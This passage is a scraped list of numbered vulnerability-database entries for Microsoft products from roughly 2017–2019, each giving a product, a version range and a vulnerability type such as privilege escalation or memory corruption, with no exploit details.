Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133181] Microsoft Office/Excel/PowerPoint up to 2019 URL Data Processing Error [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131687] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 3.2/2018 Updated 1.2 cross site scripting [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131684] Microsoft Visual Studio 2017 Version 15.9 C++ Redistributable Installer privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131675] Microsoft SharePoint 2013 SP1/2016 cross site scripting [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131656] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131334] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131333] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [131330] Microsoft Exchange Server 2010 SP3 UR26/2013 CU22/2016 CU12/2019 CU1 privilege escalation [131329] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130832] Microsoft 2013 SP1 privilege escalation [130828] Microsoft Exchange Server 2010 SP3/2013 CU22/2016 CU12/2019 CU1 EWS privilege escalation [130826] Microsoft Office 2010 SP2 Connectivity Engine memory corruption [130825] Microsoft Office up to 2019 Connectivity Engine memory corruption [130824] Microsoft Office up to 2019 Connectivity Engine memory corruption [130823] Microsoft Office up to 2019 Connectivity Engine memory corruption [130822] Microsoft Office up to 2019 Connectivity Engine memory corruption [130821] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129847] Microsoft Team Foundation Server 2017 Update 3.1/2018 Update 1.2/2018 Update 3.2 information disclosure [129846] Microsoft Team Foundation Server 2018 Update 3.2 cross site scripting [129845] Microsoft Skype for Business 2015 CU 8 privilege escalation [128765] Microsoft Visual Studio 2017 Version 15.9 C++ Construct memory corruption [128764] Microsoft Exchange Server 2010 SP3/2013 CU21/2016 CU10/2016 CU11/2019 PowerShell API information disclosure [128763] Microsoft Exchange Server 2016 CU10/2016 CU11/2019 memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128746] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [128745] Microsoft Office up to 2019 Word Macro information disclosure [128742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [128741] Microsoft SharePoint Enterprise Server 2016 cross site scripting [128740] Microsoft SharePoint Enterprise Server 2013 SP1 cross site scripting [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128729] Microsoft Visual Studio 2010 SP1/2012 Update 5 vscontent File information disclosure [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127925] Microsoft SharePoint Enterprise Server 2016 cross site scripting [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127825] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 privilege escalation [127824] Microsoft Excel up to 2019 information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127819] Microsoft Exchange Server 2016 CU10/2016 CU11 Profile Data Data Processing Error [127817] Microsoft Excel up to 2019 information disclosure [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127814] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 Search information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127806] Microsoft Outlook up to 2019 memory corruption [127805] Microsoft Excel up to 2019 memory corruption [127804] Microsoft Excel up to 2019 memory corruption [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126938] Microsoft Team Foundation Server 2018 Update 1.1/2018 Update 3 privilege escalation [126754] Microsoft Skype for Business/Lync Server 2013 SP1/2016 Emoji privilege escalation [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126749] Microsoft Exchange Server 2010/2013/2016/2019 privilege escalation [126747] Microsoft SharePoint Enterprise Server 2013 SP1 Folder information disclosure [126746] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126745] Microsoft Project 2010 SP2/2013 SP1/2016 memory corruption [126744] Microsoft Office up to 2019 Word memory corruption [126743] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126742] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126728] Microsoft Office/SharePoint 2010 SP2 Word memory corruption [126727] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126726] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126717] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [126716] Microsoft Office up to 2019 Excel memory corruption [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125116] Microsoft Exchange Server 2013 CU21/2016 CU10 privilege escalation [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125107] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [125105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125104] Microsoft SharePoint Enterprise Server 2016 privilege escalation [125102] Microsoft Office/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125100] Microsoft Office/PowerPoint 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125099] Microsoft Office/Excel up to 2019 Protected View Data Processing Error [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123995] Microsoft Lync 2011 on Mac Security Feature privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123862] Microsoft SharePoint Enterprise Server 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [123861] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [123860] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [123859] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123846] Microsoft Office 2016 on Win/Mac memory corruption [123844] Microsoft Word 2013 RT SP1/2013 SP1/2016 PDF File privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122887] Microsoft Office 2016 on Mac AutoUpdate privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122875] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122874] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122873] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122872] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [122871] Microsoft PowerPoint 2010 SP2 memory corruption [122870] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122850] Microsoft Visual Studio 2015 Update 3/2017/2017 Version 15.8 Diagnostic Hub privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [122823] Microsoft SQL Server 2016 SP1/2016 SP2/2017 memory corruption [121208] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R Attachment privilege escalation [121118] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121114] Microsoft Access 2013 SP1/2016/2016 C2R memory corruption [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [121105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121098] Microsoft Office 2016/2016 C2R memory corruption [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [121090] Microsoft Visual Studio up to 2017 Version 15.8 Preview privilege escalation [119479] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [119477] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [119475] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 Attachment privilege escalation [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [118120] Microsoft Office 2016 on Mac XML Data privilege escalation [117561] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1 cross site scripting [117560] Microsoft Exchange Server up to 2016 CU9 memory corruption [117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117505] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [117504] Microsoft Office 2010 SP2 information disclosure [117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117502] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [117501] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117499] Microsoft Exchange Server up to 2016 CU9 information disclosure [117498] Microsoft Office 2016 C2R Security Feature 7PK Security Features [117497] Microsoft SharePoint Enterprise Server 2010/2013 SP1/2016 cross site scripting [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117473] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117472] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117471] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117470] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117469] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117468] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [116132] Microsoft Office 2016 Memory information disclosure [116051] Microsoft SharePoint Enterprise Server 2016 privilege escalation [116050] Microsoft SharePoint Enterprise Server 2010 SP2/2013/2016 privilege escalation [116049] Microsoft SharePoint Enterprise Server 2013/2016 Redirect [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116046] Microsoft SharePoint Enterprise Server 2013/2016 Share privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116023] Microsoft Office up to 2016 C2R information disclosure [116022] Microsoft Excel 2010 SP2 memory corruption [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116018] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116017] Microsoft Excel up to 2016 C2R memory corruption [116016] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Graphics privilege escalation [116014] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116013] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1 memory corruption [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure [114574] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114573] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure [114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114564] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [114562] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114560] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114559] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114558] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114557] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114556] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114555] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114554] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114553] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114552] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114551] Microsoft Excel up to 2016 C2R Security Feature 7PK Security Features [114549] Microsoft Access 2010 SP2/2013 SP1/2016 memory corruption [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113237] Microsoft SharePoint Enterprise Server 2016 cross site scripting [113236] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [113233] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [113232] Microsoft Excel 2016 privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111580] Microsoft Office 2016 on Mac Email Attachment privilege escalation [111571] Microsoft SharePoint Enterprise Server 2013/2016 Access cross site scripting [111567] Microsoft Office 2010/2013/2016 memory corruption [111564] Microsoft Word 2016 memory corruption [111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [110553] Microsoft Office 2016 C2R information disclosure [110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation [110551] Microsoft Excel 2016 C2R memory corruption [110550] Microsoft PowerPoint 2013 RT SP1/2013 SP1/2016 information disclosure [110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109391] Microsoft SharePoint Enterprise Server 2016 Project Server cross site request forgery [109389] Microsoft Excel 2016 Click-to-Run memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107741] Microsoft Outlook 2016 Secure Connection Mail information disclosure [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107732] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107729] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107728] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107727] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [107698] Microsoft Office 2016 memory corruption [106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [106531] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [106529] Microsoft PowerPoint 2016 memory corruption [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft 